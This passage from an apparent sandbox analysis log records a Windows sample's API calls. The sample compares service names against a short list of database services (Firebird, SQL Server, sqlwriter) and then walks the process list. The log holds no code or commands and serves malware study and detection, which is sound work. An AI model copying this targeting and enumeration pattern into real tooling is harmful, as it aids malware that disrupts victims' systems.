(lpString="Power") returned 5 [0205.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0205.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0205.265] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0205.265] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0205.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0205.265] lstrlenW (lpString="ProfSvc") returned 7 [0205.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0205.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0205.265] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0205.265] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0205.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0205.265] lstrlenW (lpString="RpcEptMapper") returned 12 [0205.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0205.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0205.265] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0205.265] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0205.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0205.265] lstrlenW (lpString="RpcSs") returned 5 [0205.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0205.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0205.265] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0205.265] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0205.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0205.265] lstrlenW (lpString="SamSs") returned 5 [0205.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0205.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0205.266] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0205.266] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0205.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0205.266] lstrlenW (lpString="Schedule") returned 8 [0205.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0205.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0205.266] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0205.266] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0205.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0205.266] lstrlenW (lpString="SecurityHealthService") returned 21 [0205.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0205.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0205.266] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0205.266] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0205.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0205.266] lstrlenW (lpString="SENS") returned 4 [0205.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0205.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0205.266] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0205.266] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0205.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0205.266] lstrlenW (lpString="ShellHWDetection") returned 16 [0205.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0205.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0205.266] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0205.266] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0205.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0205.266] lstrlenW (lpString="Spooler") returned 7 [0205.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0205.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0205.267] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0205.267] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0205.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0205.267] lstrlenW (lpString="sppsvc") returned 6 [0205.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0205.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0205.267] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0205.267] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0205.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0205.267] lstrlenW (lpString="SSDPSRV") returned 7 [0205.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0205.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0205.267] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0205.267] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0205.267] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x41c [0205.670] Process32FirstW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.671] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.672] lstrlenW (lpString="System") returned 6 [0205.672] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.673] lstrlenW (lpString="smss.exe") returned 8 [0205.673] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.674] lstrlenW (lpString="csrss.exe") returned 9 [0205.674] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.675] lstrlenW (lpString="wininit.exe") returned 11 [0205.675] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.676] lstrlenW (lpString="csrss.exe") returned 9 [0205.676] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.676] lstrlenW (lpString="winlogon.exe") returned 12 [0205.676] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.677] lstrlenW (lpString="services.exe") returned 12 [0205.677] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.678] lstrlenW (lpString="lsass.exe") returned 9 [0205.678] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.679] lstrlenW (lpString="svchost.exe") returned 11 [0205.679] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0205.679] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0205.679] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0205.680] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0205.680] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.681] lstrlenW (lpString="svchost.exe") returned 11 [0205.681] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.682] lstrlenW (lpString="dwm.exe") returned 7 [0205.682] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.682] lstrlenW (lpString="svchost.exe") returned 11 [0205.682] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.683] lstrlenW (lpString="svchost.exe") returned 11 [0205.683] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.684] lstrlenW (lpString="svchost.exe") returned 11 [0205.684] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.685] lstrlenW (lpString="svchost.exe") returned 11 [0205.685] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.685] lstrlenW (lpString="svchost.exe") returned 11 [0205.686] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.686] lstrlenW (lpString="svchost.exe") returned 11 [0205.686] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.687] lstrlenW (lpString="svchost.exe") returned 11 [0205.687] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.688] lstrlenW (lpString="svchost.exe") returned 11 [0205.688] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.689] lstrlenW (lpString="svchost.exe") returned 11 [0205.689] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.689] lstrlenW (lpString="spoolsv.exe") returned 11 [0205.689] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.690] lstrlenW (lpString="svchost.exe") returned 11 [0205.690] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.691] lstrlenW (lpString="svchost.exe") returned 11 [0205.691] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.692] lstrlenW (lpString="audiodg.exe") returned 11 [0205.692] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0205.692] lstrlenW (lpString="sihost.exe") returned 10 [0205.693] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.693] lstrlenW (lpString="svchost.exe") returned 11 [0205.693] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0205.694] lstrlenW (lpString="taskhostw.exe") returned 13 [0205.694] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0205.695] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0205.695] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0205.695] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0205.695] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.696] lstrlenW (lpString="explorer.exe") returned 12 [0205.696] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0205.697] lstrlenW (lpString="Memory Compression") returned 18 [0205.697] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0205.698] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0205.698] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0205.698] lstrlenW (lpString="SearchUI.exe") returned 12 [0205.698] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0205.699] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0205.699] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.700] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0205.700] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0205.701] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0205.701] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0205.701] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0205.701] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0205.702] lstrlenW (lpString="conhost.exe") returned 11 [0205.702] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0205.703] lstrlenW (lpString="roof competitive.exe") returned 20 [0205.703] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0205.704] lstrlenW (lpString="trustees.exe") returned 12 [0205.704] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0205.704] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0205.704] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0205.705] lstrlenW (lpString="isbn.exe") returned 8 [0205.705] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0205.878] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0205.878] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0205.879] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0205.879] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0205.880] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0205.880] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0205.881] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0205.881] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0205.882] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0205.882] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0205.883] lstrlenW (lpString="playstation iraq.exe") returned 20 [0205.883] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0205.884] lstrlenW (lpString="harbor.exe") returned 10 [0205.884] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0205.885] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0205.885] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0205.886] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0205.886] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0205.887] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0205.887] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0205.888] lstrlenW (lpString="bad-length-especially.exe") 